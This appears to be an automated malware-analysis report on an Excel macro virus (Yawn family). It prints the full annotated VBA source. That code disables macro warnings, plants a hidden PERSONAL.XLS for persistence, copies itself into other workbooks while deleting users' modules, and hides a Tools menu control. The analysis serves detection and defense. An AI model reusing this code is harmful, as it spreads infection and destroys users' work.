MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is an Excel document containing VBA macros, including an Auto_Open macro that runs automatically when the workbook is opened with macros enabled — a common technique in malicious documents. The VBA code attempts to write the value 'Options6' under the registry key 'HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel', likely to establish persistence. The ClamAV detection further confirms its malicious nature.
Heuristics 3
-
ClamAV: Xls.Trojan.Yawn-1 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Xls.Trojan.Yawn-1
-
VBA project inside OOXML medium 1 related finding OOXML_VBA — Document contains a VBA project — VBA macros present
-
Auto_Open macro low OLE_VBA_AUTO — Auto_Open macro. Matched line in script:
Private Sub auto_open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5074 bytes |
SHA-256: d95fd492012329d2bf588e60725df4c56c744636d189cd332ba9a4c87e6752cf |
|||
|
Detection
ClamAV:
Xls.Trojan.Yawn-1
Obfuscation or payload:
unlikely
|
|||
Preview script — First 1,000 lines of the extracted script
' Exported headers of the document's built-in ThisWorkbook and Sheet1 components.
' The preview shows no procedure code under either header, so everything this
' sample does lives in the standard module "FF" that follows.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FF"
Private Declare Function RegOpenKeyExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long ' Win32 registry API; called once, from auto_open
Private Declare Function RegSetValueExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long ' writes the "Options6" DWORD in auto_open
Private Declare Function RegCloseKey Lib "ADVAPI32.DLL" (ByVal hKey As Long) As Long
Global Const REG_DWORD As Long = 4 ' value type handed to RegSetValueExA
Global Const HKEY_CURRENT_USER As Long = &H80000001 ' per-user hive: writable without elevation
Dim p As String ' path separator, filled from Application.PathSeparator in auto_open
Dim AppS As String ' Excel startup folder, filled from Application.StartupPath in auto_open
'taitai
' The line above is the infection marker: ActOpf_Evt reads line 9 of a target
' workbook's first standard module and compares it with "'taitai" to decide whether
' that module is already this family's. The check is by line position, so comments
' are added here only as trailing comments to keep the marker's line unchanged.
' KEY_ALL_ACCESS, used by auto_open, is not declared anywhere in this listing.
' Entry point; Excel runs it automatically when the workbook opens with macros enabled.
' Sequence: (1) write a DWORD "Options6" under HKCU\Software\Microsoft\Office\8.0\Excel\Microsoft Excel,
' (2) record Excel's path separator and startup folder, (3) tamper with the Tools menu (DelMcr),
' (4) if running from PERSONAL.XLS act as the spreader (hook ActOpf_Evt), otherwise drop or
' refresh PERSONAL.XLS via CkStrUP.
Private Sub auto_open()
' KEY_ALL_ACCESS and k are never declared in this listing; absent Option Explicit they are
' implicit Variants, so samDesired is passed as 0. The return code u is never checked, so a
' failed open does not stop the write below.
u = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0, KEY_ALL_ACCESS, k)
' Stores 4 bytes from a 1-byte buffer Chr$(0): the first byte is zero, the remaining three
' are read from beyond the string. NOTE(review): "Options6" under the Excel 8.0 key is
' widely reported as the Excel 97 macro-warning setting, and writing 0 here is consistent
' with suppressing that prompt — confirm; the report summary reads this write as persistence.
u = RegSetValueExA(k, "Options6", 0, REG_DWORD, Chr$(0), 4)
u = RegCloseKey(k)
p = Application.PathSeparator
AppS = Application.StartupPath ' XLSTART folder: workbooks placed here open on every Excel launch
DelMcr
' Where is this code running from? Inside the dropped PERSONAL.XLS it spreads to other
' workbooks; inside any other infected workbook it first drops/refreshes PERSONAL.XLS.
If UCase(ThisWorkbook.Name) = "PERSONAL.XLS" Then
Application.OnSheetActivate = "ActOpf_Evt" ' application-wide hook: runs ActOpf_Evt on each sheet activation
ActOpf_Evt
Else
CkStrUP
End If
End Sub
' Spreader. Installed as the OnSheetActivate handler, so it runs whenever a sheet is
' activated. Any runtime error jumps to h_er, which does nothing and exits — leaving
' DisplayAlerts and ScreenUpdating switched off in that case.
Private Sub ActOpf_Evt()
On Error GoTo h_er
Application.DisplayAlerts = False ' suppresses save/overwrite prompts for the Save calls below
Application.ScreenUpdating = False
awn = ActiveWorkbook.Name
' Only workbooks whose extension starts ".xl" (e.g. ".xls") are considered.
If Left(Right(awn, 4), 3) = ".xl" Then
aw_m_n = Chk_Mo_N(awn) ' name of the target's first standard module, "" if it has none
If aw_m_n = "" Then
' Target has no standard module: copy this workbook's modules in and save the target.
n = Chk_Mo_N(ThisWorkbook.Name)
cop_m (n)
Workbooks(awn).Save
Else
' Target already has a module: read its 9th line and look for the 'taitai marker.
' NOTE(review): on Excel versions that gate programmatic VBProject access behind the
' "Trust access to the VBA project object model" setting these references raise and the
' handler exits silently; presumably why the sample targets the Excel 8.0 key — confirm.
m_n = ActiveWorkbook.VBProject.vbcomponents(aw_m_n).codemodule.Lines(9, 1)
If m_n <> "'taitai" Then
' Not this family's code: every standard (Type 1) and class (Type 2) module the user
' had is deleted, then this workbook's modules are copied in and the target saved.
Set v_c = ActiveWorkbook.VBProject.vbcomponents
For i = v_c.Count To 1 Step -1 ' iterate backwards because Remove shrinks the collection
If v_c(i).Type = 1 Or v_c(i).Type = 2 Then
v_c.Remove v_c(i)
End If
Next i
n = Chk_Mo_N(ThisWorkbook.Name)
cop_m (n)
Workbooks(awn).Save
End If
End If
End If
Application.ScreenUpdating = True
Application.DisplayAlerts = True
Exit Sub
' Empty error handler: failures are swallowed without restoring the two settings above.
h_er:
End Sub
' Dropper. Ensures a PERSONAL.XLS carrying this code exists in Excel's startup folder,
' re-opens it, and points the application-wide OnSheetActivate hook at its ActOpf_Evt.
Private Sub CkStrUP()
Application.DisplayAlerts = False
Application.ScreenUpdating = False
f1 = "PERSONAL.XLS"
If UCase(Dir(AppS & p & f1)) <> f1 Then
cre_f ' no PERSONAL.XLS in the startup folder: create one
ElseIf chk_per = False Then
' A PERSONAL.XLS exists but is not recognised as this family's: the user's genuine
' personal macro workbook is closed, deleted from disk and replaced.
Workbooks("Personal.xls").Close
Kill AppS & p & f1
cre_f
Else
End If
' No error handler in this procedure: if Personal.xls is not open at this point, Close raises.
Workbooks("Personal.xls").Close
Workbooks.Open AppS & p & "Personal.xls"
' Fully qualified macro reference of the form '<startup folder><sep>PERSONAL.XLS'!ActOpf_Evt
Application.OnSheetActivate = "'" & AppS & p & f1 & "'!ActOpf_Evt"
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub
' Returns True when the result of ExecuteExcel4Macro(arg) equals the name of the first
' standard module in Personal.xls, False otherwise. `arg` is never assigned anywhere in
' this listing, so the XLM call runs with an Empty argument; what it evaluates to cannot
' be determined from the extracted code.
Private Function chk_per()
ar2 = ExecuteExcel4Macro(arg)
ModuleName1 = Chk_Mo_N("Personal.xls")
If ar2 <> ModuleName1 Then
chk_per = False
Else
chk_per = True
End If
End Function
' Returns the name of the first standard module (vbcomponents Type = 1) in workbook WkName,
' or "" when the project has components but none of them is a standard module. Errors are
' ignored (On Error Resume Next): if the workbook is not open or its VBProject cannot be
' read, the loop never runs and the function returns Empty, which compares equal to "".
Private Function Chk_Mo_N(WkName)
On Error Resume Next
Set a1 = Workbooks(WkName).VBProject.vbcomponents
For i = 1 To a1.Count
If a1(i).Type = 1 Then
Chk_Mo_N = a1(i).Name
Exit For
Else
Chk_Mo_N = ""
End If
Next i
End Function
' Builds the dropper copy: a new, hidden, single-sheet workbook carrying this code, saved
' as Personal.xls in Excel's startup folder so it is loaded on every launch.
Private Sub cre_f()
Workbooks.Add
n = Chk_Mo_N(ThisWorkbook.Name)
' Two-letter pseudo-random module name: each Chr((...) Mod 21 + 65) yields a letter A–U,
' one derived from =rand(), one from the time portion of Now().
Range("C1") = "=rand()"
r_n = Chr((Range("C1") * 100) Mod 21 + 65) & _
Chr((Val(Left(Right(Now(), 5), 2)) * 100) Mod 21 + 65)
Range("C1") = r_n ' the chosen name stays in cell C1 of the dropped Personal.xls — a forensic indicator
cop_m (n)
ActiveWorkbook.VBProject.vbcomponents(n).Name = r_n ' module name varies per victim
Set aw = ActiveWorkbook.Sheets
For i = aw.Count To 2 Step -1 ' keep only the first sheet
aw(i).Delete
Next i
aw_n = ActiveWorkbook.Name
ActiveWindow.Visible = False ' hidden window, as a genuine personal macro workbook would be
Workbooks(aw_n).SaveAs AppS & p & "Personal.xls"
End Sub
' Copies this workbook's standard module n and its class module "Class1" into the active
' workbook, via a temporary export file named "t" (no extension) in the startup folder
' that is deleted after each import. Errors are ignored. The Class1 source is referenced
' here but is not part of this extracted listing.
Private Function cop_m(n)
On Error Resume Next
Set tw = ThisWorkbook.VBProject.vbcomponents
Set aw = ActiveWorkbook.VBProject.vbcomponents
tw(n).Export (AppS & p & "t")
aw.Import (AppS & p & "t")
Kill (AppS & p & "t")
tw("Class1").Export (AppS & p & "t")
aw.Import (AppS & p & "t")
Kill (AppS & p & "t")
End Function
' Menu tampering: resets the Tools command bar and removes its 10th control when that
' control's Id is 30017. NOTE(review): 30017 is presumably the Tools > Macro submenu
' (the name DelMcr reads as "delete Macro"), which would remove the usual route to the
' macro list and VB Editor — confirm. Errors are ignored; the originally active workbook
' is re-activated at the end.
Private Sub DelMcr()
On Error Resume Next
n1 = ActiveWorkbook.Name
Set a2 = Application.CommandBars("Tools")
a2.Reset
If a2.Controls(10).Id = 30017 Then
a2.Controls(10).Delete
End If
Workbooks(n1).Activate
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 18432 bytes |
SHA-256: 8587d6137d74e570be83ac7ebc392189678c586fea832e42656c6dd96028a8bf |
|||
|
Detection
ClamAV:
Xls.Trojan.Yawn-1
Obfuscation or payload:
unlikely
|
|||